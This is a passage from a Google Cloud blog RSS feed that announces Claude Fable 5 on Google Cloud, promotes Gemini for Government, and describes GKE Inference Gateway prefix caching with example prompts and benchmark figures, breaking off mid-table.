<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>Cloud Blog</title><link>https://cloud.google.com/blog/</link><description>Cloud Blog</description><atom:link href="https://cloudblog.withgoogle.com/blog/rss/" rel="self"></atom:link><language>en</language><lastBuildDate>Tue, 09 Jun 2026 18:22:57 +0000</lastBuildDate><image><url>https://cloud.google.com/blog/static/blog/images/google.a51985becaa6.png</url><title>Cloud Blog</title><link>https://cloud.google.com/blog/</link></image><item><title>Claude Fable 5: Available on Google Cloud</title><link>https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Claude Fable 5&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, Anthropic’s latest frontier model, is now generally available on Google Cloud.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; This launch is the latest proof point of our ongoing commitment to bring the industry's latest models straight to our Agent Platform. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Claude Fable 5 brings the best of Anthropic model capabilities to all customers, with strong safeguards designed to make it safe for general use. Designed for complex, multi-step reasoning, Claude Fable 5 is good for demanding tasks like advanced software development, long-horizon agents, and deep multimodal document analysis. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;For more information about this release, visit Anthropic’s &lt;/span&gt;&lt;a href="https://www.anthropic.com/news/claude-fable-5-mythos-5" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Build with&lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/publishers/anthropic/model-garden/claude-fable-5"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; Claude Fable 5&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and other models from Anthropic — including Claude Opus 4.8 and Claude Sonnet 4.6 — today on &lt;/span&gt;&lt;a href="https://cloud.google.com/model-garden?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 18:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud/</guid><category>AI &amp; Machine Learning</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/claude_fable_5.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Claude Fable 5: Available on Google Cloud</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/original_images/claude_fable_5.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Michael Gerstenhaber</name><title>VP, Product Management, Cloud AI</title><department></department><company></company></author></item><item><title>Gemini for Government: Your blueprint for mission impact</title><link>https://cloud.google.com/blog/topics/public-sector/gemini-for-government-your-blueprint-for-mission-impact/</link><description>&lt;div class="block-paragraph"&gt;&lt;p data-block-key="9m6ur"&gt;The public sector has reached a critical inflection point. For years, organizations have explored what’s possible through isolated AI pilots and experimentation. Today, the question has shifted to “what creates impact?” where the focus is no longer on hypotheticals, but on achieving real productivity gains, improving services and outcomes, and advancing your mission - &lt;i&gt;right now.&lt;/i&gt; Meeting this moment requires more than just a powerful model—it requires an integrated approach with the security, reliability, scale, and cost-efficiency that public sector missions require.&lt;/p&gt;&lt;p data-block-key="9578k"&gt;Today, public sector organizations are moving swiftly from AI assistants and chatbots to a full-scale agentic taskforce - here’s how they are doing it.&lt;/p&gt;&lt;h3 data-block-key="2u2ma"&gt;&lt;b&gt;Building on a unified foundation&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="43bl8"&gt;To move AI and agents into production at scale, you need to remove the friction of integration. Google Cloud offers a complete AI stack designed to work as one unified system. We believe this integrated stack is the engine for true transformation in the agentic era.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/GC_Stack.max-1000x1000.png"
        
          alt="GC_Stack"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="9m6ur"&gt;Let’s take a closer look at this integrated stack:&lt;/p&gt;&lt;ul&gt;&lt;li data-block-key="3lfgi"&gt;&lt;b&gt;It all starts with the AI Hypercomputer&lt;/b&gt; — our purpose-built infrastructure foundation is optimized for the physics and scale of the agentic era, and powered by both GPUs and TPUs. We continue to invest in our portfolio and made several announcements at Cloud Next ‘26 including the launch of our &lt;a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive?e=48754805"&gt;eighth-generation TPU&lt;/a&gt; and updates to our &lt;a href="https://cloud.google.com/blog/products/compute/cross-cloud-infrastructure-at-next26?e=48754805"&gt;cross-cloud infrastructure&lt;/a&gt; which includes new innovations across fluid compute, secure cross-cloud connectivity, the unified data layer and digital sovereignty.&lt;/li&gt;&lt;li data-block-key="bggir"&gt;We deliver &lt;b&gt;research from Google DeepMind as well as frontier models&lt;/b&gt; to provide intelligence with speed and efficiency. We offer choice across Google’s leading models like our recently announced &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/innovations-from-google-io-26-on-google-cloud?e=48754805#:~:text=Expand%20what%E2%80%99s%20possible%20with%20Gemini%203.5"&gt;Gemini 3.5&lt;/a&gt; alongside other open and third-party options.&lt;/li&gt;&lt;li data-block-key="f5tbp"&gt;Our &lt;b&gt;agentic data cloud&lt;/b&gt; grounds your AI in trusted real-time organizational truth and context. We help you build a 'system of action' with our latest breakthroughs announced at Cloud Next ‘26 including the &lt;a href="https://cloud.google.com/transform/shift-system-of-action-architecting-the-agentic-data-cloud-AI?e=48754805#:~:text=Solving%20the%20walled,massive%20egress%20fees."&gt;Cross-cloud Lakehouse&lt;/a&gt; and &lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-the-google-cloud-knowledge-catalog?e=48754805"&gt;Knowledge Catalog&lt;/a&gt;.&lt;/li&gt;&lt;li data-block-key="1191k"&gt;With our &lt;b&gt;agentic defense&lt;/b&gt; you get &lt;a href="https://cloud.google.com/learn/what-is-zero-trust?e=48754805"&gt;zero-trust&lt;/a&gt; protection that secures your entire AI lifecycle from code to cloud. To help you navigate the agentic era securely, we recently launched &lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense?e=48754805"&gt;Google AI Threat Defense&lt;/a&gt; — an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your organization.&lt;/li&gt;&lt;li data-block-key="elqsb"&gt;At Cloud Next ‘26 we unveiled &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform?e=48754805"&gt;Gemini Enterprise Agent Platform&lt;/a&gt;, our comprehensive platform to build, scale, govern and optimize agents with architectural rigor. This platform brings together model selection, model building, and agent building capabilities with new features for agent integration, development, orchestration, and security.&lt;/li&gt;&lt;li data-block-key="brmti"&gt;All of this comes together at the top with pre-built specialized &lt;b&gt;agents&lt;/b&gt; and &lt;b&gt;applications&lt;/b&gt; that are ready to transform your organization from day 1. We announced new capabilities at Cloud Next ‘26 including &lt;a href="https://workspace.google.com/blog/product-announcements/introducing-workspace-intelligence" target="_blank"&gt;Workspace Intelligence&lt;/a&gt; - a secure and dynamic system that inherently understands complex semantic relationships within your Workspace apps (such as Docs, Slides, or Gmail), your active projects, your collaborators, and your organization's domain knowledge.&lt;/li&gt;&lt;/ul&gt;&lt;h3 data-block-key="c2u6i"&gt;&lt;b&gt;Delivering uncompromising security and control&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="3n186"&gt;For many public sector organizations, security &lt;i&gt;is&lt;/i&gt; the mission. This new era of mission-ready and secure AI is defined by the ability to work across silos and legacy systems. IT system administrators have access to a built-in AI Control Dashboard—a single pane of glass to centrally visualize, secure, and audit the organization’s entire AI estate. Through &lt;a href="https://docs.cloud.google.com/agent-registry/overview"&gt;Agent Registry&lt;/a&gt;, administrators maintain complete visibility into active agents and their grounded data sources, ensuring that every interaction stays within the strict guardrails of agency policy and security mandates. &lt;a href="https://cloud.google.com/security/products/model-armor?e=48754805"&gt;Model Armor&lt;/a&gt; provides comprehensive protections against prompt injection, sensitive data leaks, and harmful content. Built on a &lt;a href="https://cloud.google.com/learn/what-is-zero-trust?e=48754805"&gt;Zero Trust foundation&lt;/a&gt;, Gemini for Government includes FedRAMP High-authorized security and compliance features and is backed by a Data Privacy Guarantee stating that Google does not train its foundational models on customer data. At &lt;a href="https://cloud.google.com/blog/products/identity-security/next26-redefining-security-for-the-ai-era-with-google-cloud-and-wiz?e=48754805"&gt;Google Cloud Next ‘26,&lt;/a&gt; we introduced new development tools to secure AI-generated code and mitigate the risk of shadow AI, and also shared how we are protecting AI and cloud apps across any infrastructure with &lt;a href="https://cloud.google.com/blog/products/identity-security/google-completes-acquisition-of-wiz?e=48754805"&gt;Wiz&lt;/a&gt;.&lt;/p&gt;&lt;h3 data-block-key="3khal"&gt;&lt;b&gt;Scaling agents across the organization&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="766ab"&gt;In order to realize AI’s true potential, it must be in the hands of your people — caseworkers, inspectors, analysts and more. Google Public Sector was proud to be the first technology provider to offer an enterprise AI tool, Gemini for Government, through GenAI.mil to more than three million civilian and military personnel. We recently introduced a &lt;a href="https://cloud.google.com/blog/topics/public-sector/gemini-for-government-build-custom-ai-agents-for-unclassified-work-on-genaimil/?e=48754805"&gt;new feature within Gemini for Government&lt;/a&gt; on GenAI.mil called Agent Designer which enables DoW civilian and military personnel to build their own agents to support unclassified work tasks.&lt;/p&gt;&lt;p data-block-key="8a0ej"&gt;With &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/agent-designer"&gt;Agent Designer&lt;/a&gt;, non-technical users can build sophisticated AI agents using natural language through no-code interfaces. Our goal is to provide the tools to empower &lt;i&gt;everyone&lt;/i&gt; in the organization to build and use agents that connect securely to existing systems and enterprise applications. This is all about using AI and agents to automate manual and time consuming tasks, improve productivity, and ensure you and your teams can apply your experience and judgment to the most critical aspects of your work.&lt;/p&gt;&lt;h3 data-block-key="225g7"&gt;&lt;b&gt;Achieving tangible ROI&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="7tqqn"&gt;According to our recent &lt;a href="https://cloud.google.com/blog/topics/public-sector/key-insights-from-our-inaugural-survey-on-the-roi-of-ai-in-the-public-sector/?e=48754805"&gt;ROI of AI in the public sector report&lt;/a&gt;, agentic and generative AI is already helping public sector teams get more done. According to our findings, &lt;b&gt;70%&lt;/b&gt; of public sector leaders report improved productivity from gen AI. Of those reporting productivity, &lt;b&gt;46%&lt;/b&gt; say employee productivity has at least doubled. This directly translates into faster response times, more efficient public services, and overall better outcomes. &lt;a href="https://ai.google.dev/gemini-api/docs/interactions/deep-research" target="_blank"&gt;Gemini Deep Research Agent&lt;/a&gt; and &lt;a href="https://notebooklm.google/?gad_source=1&amp;amp;gad_campaignid=22476587015&amp;amp;gbraid=0AAAAA-fwSsc9O8X8TnAEA8uvL58QrYtN-&amp;amp;gclid=Cj0KCQjwz9_QBhD_ARIsADnSCfAm5Xad2GqSBZtd00eB3Rjlt5IcFDwMkdE5gbYKh_u4ss7UGIFNeH8aAkNhEALw_wcB" target="_blank"&gt;NotebookLM&lt;/a&gt; are force multipliers for the public sector, transforming how complex research, deep work and analysis is conducted.&lt;/p&gt;&lt;h3 data-block-key="f70pu"&gt;&lt;b&gt;Your blueprint for mission impact&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="ckocp"&gt;With Gemini for Government, you are able to move beyond AI exploration and pilots, to real world applications and agents - at scale. This is all about applying technology to amplify human capacity, accelerate strategic decision-making, and advance your mission.&lt;/p&gt;&lt;p data-block-key="6tt10"&gt;Register to attend our &lt;a href="https://cloudonair.withgoogle.com/events/gemini-for-government-the-blueprint-for-mission-impact?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-northam-PUB39634-onlineevent-er-q2-26-g4g-webinar&amp;amp;utm_content=kd_bp&amp;amp;utm_term=-" target="_blank"&gt;Gemini for Government webinar&lt;/a&gt; on June 11 where we’ll dive deeper into how to leverage data, security, and an integrated AI stack. Whether you are looking to scale day-one use cases across your organization, empower your internal champions, or are just getting started, you will leave with a clear path forward to drive impact and advance your mission today.&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 17:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/public-sector/gemini-for-government-your-blueprint-for-mission-impact/</guid><category>Public Sector</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/G4Gblog_image.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Gemini for Government: Your blueprint for mission impact</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/G4Gblog_image.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/public-sector/gemini-for-government-your-blueprint-for-mission-impact/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Elizabeth Moon</name><title>Managing Director, Customer Engineering</title><department></department><company>Google Public Sector</company></author></item><item><title>Report: GKE Inference Gateway delivers up to 92% faster AI responses</title><link>https://cloud.google.com/blog/products/containers-kubernetes/gke-inference-gateway-prefix-caching-accelerates-ai-inference/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As generative AI moves from experimental pilots to massive production environments, the efficiency of your infrastructure  becomes the ultimate differentiator. One way to get the most out of it and minimize costly accelerator idle time is to leverage the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-gke-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Kubernetes Engine (GKE) Inference Gateway&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which intelligently routes generative AI workloads based on real-time model server metrics.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of relying on traditional, naive round-robin load balancing — which frequently triggers expensive accelerator recomputation and spikes user latency — this native extension of the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/gateway-api"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE Gateway&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; utilizes advanced capabilities like &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-gke-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;prefix caching&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-gke-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;model-aware routing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. By ensuring requests land on the exact accelerator that is primed to process them right away, GKE transforms how you can serve your large language models (LLMs), with excellent hardware utilization and ultra-fast response times. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In fact, according to an&lt;/span&gt;&lt;a href="https://www.principledtechnologies.com/Google/GKE-Inference-Gateway-study-0526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; independent benchmark report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE Inference Gateway outperforms the next leading managed Kubernetes service with 15.7% higher throughput, 92.8% shorter wait times, and 62.6% lower inter-token latency&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This performance takes LLM-based applications from sluggish and  expensive to fast and production-grade.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That performance tracks with &lt;/span&gt;&lt;a href="https://www.snap.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Snap&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;’s experience using GKE Inference Gateway. &lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“At Snap, we are integrating llm-d into our production AI infrastructure to facilitate high-performance inference at scale. By employing prefix-cache-aware routing, we have achieved prefix cache hit rates ranging up to 75-80%. We appreciate the open-source nature of llm-d, as it enables seamless integration with our Envoy-based Service Mesh.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - Vinay Kola, Senior Manager, Software Engineering, Snap Inc. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we take a closer look at GKE Inference Gateway’s prefix caching, complete with examples. We also provide more details about its benchmark results. Let’s jump in.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The secret to low-latency AI: Prefix caching&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prefix caching&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; optimizes LLM performance by storing the KV cache (activation states) of long, repetitive prompt prefixes. When consecutive user requests share the same system instructions, context, or documentation, the model entirely skips reprocessing those tokens. GKE Inference Gateway reads incoming request prefixes and matches them to the specific pods that already hold that data in memory. This eliminates the "thinking" tax on your GPUs and TPUs, turning heavy reasoning loops into near-instant answers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Use case 1:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Documentation and codebase Q&amp;amp;A with retrieval-augmented generation (RAG) &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When querying massive enterprise repositories, you can ground your LLMs’ responses without any added latency by pinning entire documentation sets as static cached prefixes, using RAG.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of forcing an LLM to re-read thousands of lines of API references or corporate wikis for every single user question, GKE Inference Gateway routes the query to a pod that already has that specific context warmed up in its KV cache. The LLM only has to compute the user's brief, dynamic question, completely bypassing expensive document re-evaluation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;[STATIC PREFIX - STAYS IN CACHE] You are an expert AI assistant specializing in technical documentation. Below is the complete API documentation for our software platform. Use this context to answer the user\&amp;#x27;s questions accurately. If the answer cannot be found in the documentation, say &amp;quot;I cannot find that in the provided context.&amp;quot; \r\n\r\n&amp;lt;documentation&amp;gt; [10,000+ words of API reference documentation, endpoints, error codes, etc.] &amp;lt;/documentation&amp;gt; \r\n\r\n[DYNAMIC SUFFIX - CHANGES PER REQUEST] User Question: How do I handle a 429 rate limit error using the Python SDK?&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0ddc940&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Use case 2: Multi-turn chat  &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can also use prefix caching to maintain customer service interactions across thousands of simultaneous sessions without compounding compute costs. You can do so by caching permanent system personas and core business rules directly on the LLM server.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In enterprise chat architectures, the base system prompt and reference tables remain completely identical across millions of customer interactions. GKE Inference Gateway handles these multi-turn conversations using context-aware routing to bypass repetitive token processing, so that your chatbot stays ultra-responsive even under peak traffic.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;[STATIC PREFIX - STAYS IN CACHE] \r\n-System Persona: You are &amp;quot;FinBot&amp;quot;, a helpful, empathetic, and compliant virtual assistant for ABC Banking Solutions. You must strictly adhere to the following rules: 1. Never provide concrete investment advice. 2. Always verify if the user is asking about checking or savings. 3. Keep your answers under 3 sentences. 4. If a user is angry, offer to connect them to a human manager. \r\n\r\nHere is the current interest rate table for May 2026: \r\n- Savings: 4.2% APR \r\n- Checking: 0.5% APR \r\n- CD (12-month): 5.1% APR \r\n\r\n[DYNAMIC SUFFIX - CHANGES PER REQUEST] User: Hi, I\&amp;#x27;m trying to figure out how much I\&amp;#x27;d make if I locked away $10,000 for a year?&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0ddc3d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE outperforms alternative managed Kubernetes solutions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To validate these architectural advantages, Principled Technologies recently released an independent &lt;/span&gt;&lt;a href="https://www.principledtechnologies.com/Google/GKE-Inference-Gateway-study-0526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;benchmark report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; comparing GKE (equipped with the GKE Inference Gateway) against a standard third-party managed Kubernetes service utilizing conventional round-robin HTTP load balancing.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Tested on a Llama 3.1 8B Instruct shared prefix workload using identical hardware (eight NVIDIA A100 40GB GPUs) the results reveal a massive performance gap between the two Kubernetes services. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE didn't just win; it completely redefined inference efficiency across three critical metrics:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Higher throughput:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; 15.7% more tokens processed per second, enabling higher request capacity or reduced hardware needs for the same workload&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Much faster time to first token (TTFT):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; 92.8% shorter wait times, producing dramatically quicker perceived response starts for interactive scenarios&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Lower inter-token latency (ITL):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; 62.6% reduction, resulting in smoother and faster token streaming after the first token &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_-_Updated_Doc_chart.max-1000x1000.jpg"
        
          alt="1 - Updated Doc chart"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="g6g32"&gt;Figure 3: Mean latency (normalized time per output token) of GKE with GKE Inference Gateway and third-party managed Kubernetes service on the Llama 3.1-8B Instruct LLM on the Shared prefix use case. Both solutions used the same hardware. Source: Principled Technologies&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col/&gt;&lt;col/&gt;&lt;col/&gt;&lt;col/&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3rd party Managed&lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;Kubernetes Service&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE Advantage&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Mean output&lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;token throughput&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7,169.21 output&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;tokens per second&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;6,042.05 output&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;tokens per second&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;15.7% more output&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;token throughput&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Mean time to&lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;first token (TTFT)&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;188.36 ms&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2624.73 ms&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;92.8% less TTFT&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Mean inter-token&lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;latency (ITL)&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
